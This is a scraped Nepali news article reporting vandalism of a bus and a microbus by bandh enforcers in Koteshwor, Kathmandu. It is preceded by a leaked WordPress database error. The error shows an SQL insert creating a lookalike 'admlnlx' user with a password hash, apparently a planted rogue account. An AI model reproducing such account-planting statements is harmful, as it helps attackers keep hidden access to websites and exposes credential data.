WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbozjSFPmOYaUAoL5OFdQmdxOtahIs1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 10:47:27', '', 'admlnlx', 'admlnlx')

दुईवटा सार्वजनिक गाडीमा तोडफोड – Gaule Khabar

दुईवटा सार्वजनिक गाडीमा तोडफोड

दुईवटा सार्वजनिक गाडीमा तोडफोड

काठमाण्डौ । काठमाडौंको कोटेश्वरमा दुईवटा सार्वजनिक गाडीमा बन्दकर्ताहरुले तोडफोड गरेका छन् ।

बन्द गराउँदै हिँडेका विप्लव नेतृत्वको नेपाल कम्यूनिष्ट पार्टीका कार्यकर्ताले गाडी तोडफोड गरेको बताएको छ । कोटेश्वरको आकाशे पुल नजिक बा‍। ४ ख ९३९४ नम्बरको बसमा तोडफोड गरिएको छ । ‘महासागर’ लेखिएको बसको अगाडीको भागमा क्षति पुगेको छ । त्यस्तै भाटभटेनी अगाडी बा।३ ख ७९०६ नम्बरको हाइस गाडी तोडफोड गरिएको छ । माइक्रोबसको अगाडीको भागको सिसा फुटेको छ ।

पठाओ चढेर आएका युवकले बस तोडफोड गरेका हुन् । बस तोडफोड गर्ने एकजना युवकलाई प्रहरीले पक्राउ गरेको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका